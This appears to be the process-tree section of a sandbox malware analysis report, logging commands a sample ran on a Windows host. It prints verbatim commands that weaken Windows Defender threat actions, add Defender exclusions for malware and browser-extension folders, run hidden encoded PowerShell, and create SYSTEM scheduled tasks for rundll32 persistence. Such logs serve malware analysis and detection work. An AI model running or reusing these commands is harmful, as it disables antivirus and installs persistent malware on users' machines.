powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5072

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:3972

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:3416

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:4876

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:3008

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:4924

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:3116

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:3064

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:4808

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:1920

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:2216

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:3796

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:5084

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:4960

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:4192

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:3996

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:1968

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:3628

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:1748

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:1104

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:3060

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:3580

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:448

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:1800

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:3916

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:4536

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
3⤵
PID:4988

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
3⤵
PID:1468

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
3⤵
PID:2568

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
3⤵
PID:3288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RNplELueU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RNplELueU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fLdzueVMGzfAC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fLdzueVMGzfAC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nWWVEJXizSHU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nWWVEJXizSHU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uYPtQNsySKcOueCgHDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uYPtQNsySKcOueCgHDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ushFnVEJKMUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ushFnVEJKMUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\evUSZSaqPkAEukVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\evUSZSaqPkAEukVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\XwIFwyvoUqntekhn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\XwIFwyvoUqntekhn\" /t REG_DWORD /d 0 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4184

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RNplELueU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1496

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RNplELueU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:636

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RNplELueU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3316

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fLdzueVMGzfAC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2000

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fLdzueVMGzfAC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:652

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nWWVEJXizSHU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2936

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nWWVEJXizSHU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4876

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uYPtQNsySKcOueCgHDR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3008

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uYPtQNsySKcOueCgHDR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:5028

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ushFnVEJKMUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4368

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ushFnVEJKMUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1424

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\evUSZSaqPkAEukVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:4588

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\evUSZSaqPkAEukVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:1920

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2636

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4684

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:364

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2216

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN /t REG_DWORD /d 0 /reg:32
3⤵
PID:3796

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN /t REG_DWORD /d 0 /reg:64
3⤵
PID:5084

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\XwIFwyvoUqntekhn /t REG_DWORD /d 0 /reg:32
3⤵
PID:4960

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\XwIFwyvoUqntekhn /t REG_DWORD /d 0 /reg:64
3⤵
PID:4192

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ginUsAQSy" /SC once /ST 11:38:15 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Scheduled Task/Job: Scheduled Task
PID:4608

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "ginUsAQSy"
2⤵
PID:1748

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ginUsAQSy"
2⤵
PID:4192

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "QVuDljbAZykxnpoWI" /SC once /ST 00:25:46 /RU "SYSTEM" /TR "\"C:\Windows\Temp\XwIFwyvoUqntekhn\ooWCIvMMypBCeYz\EewdQlg.exe\" Cc /jtQLdidFZ 385137 /S" /V1 /F
2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1116

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "QVuDljbAZykxnpoWI"
2⤵
PID:2560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 936
2⤵
- Program crash
PID:4116

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4444 -ip 4444
1⤵
PID:4436

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:3580

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:4932

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:2000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:3972

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:5020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 968 -ip 968
1⤵
PID:1528

C:\Windows\Temp\XwIFwyvoUqntekhn\ooWCIvMMypBCeYz\EewdQlg.exe
C:\Windows\Temp\XwIFwyvoUqntekhn\ooWCIvMMypBCeYz\EewdQlg.exe Cc /jtQLdidFZ 385137 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:3656

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bBfKaGDnIKdTdJZScE"
2⤵
PID:1640

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
2⤵
PID:1944

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
3⤵
PID:2200

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
4⤵
PID:1104

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4956

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
6⤵
PID:404

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\RNplELueU\lydUtC.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "wgFtIVrBuHdIdLf" /V1 /F
2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:3468

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "wgFtIVrBuHdIdLf2" /F /xml "C:\Program Files (x86)\RNplELueU\TXrIinT.xml" /RU "SYSTEM"
2⤵
- Scheduled Task/Job: Scheduled Task
PID:3508

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "wgFtIVrBuHdIdLf"
2⤵
PID:4984

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "wgFtIVrBuHdIdLf"
2⤵
PID:888

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "tIlFGqArMHXptH" /F /xml "C:\Program Files (x86)\nWWVEJXizSHU2\ykqnqpK.xml" /RU "SYSTEM"
2⤵
- Scheduled Task/Job: Scheduled Task
PID:1376

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "IkBmJZAegNpZy2" /F /xml "C:\ProgramData\evUSZSaqPkAEukVB\XQpVuZs.xml" /RU "SYSTEM"
2⤵
- Scheduled Task/Job: Scheduled Task
PID:1716

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "PAxmAUNtgsWrISWfx2" /F /xml "C:\Program Files (x86)\uYPtQNsySKcOueCgHDR\MDsNVre.xml" /RU "SYSTEM"
2⤵
- Scheduled Task/Job: Scheduled Task
PID:624

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "OurksSTJxLQIbfTMDbR2" /F /xml "C:\Program Files (x86)\fLdzueVMGzfAC\JosforS.xml" /RU "SYSTEM"
2⤵
- Scheduled Task/Job: Scheduled Task
PID:4252

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "vczjtXgpVbXDKOBgh" /SC once /ST 01:51:22 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\XwIFwyvoUqntekhn\FpQKktGP\GqrceEq.dll\",#1 /pHedidajOF 385137" /V1 /F
2⤵
- Drops file in Windows directory
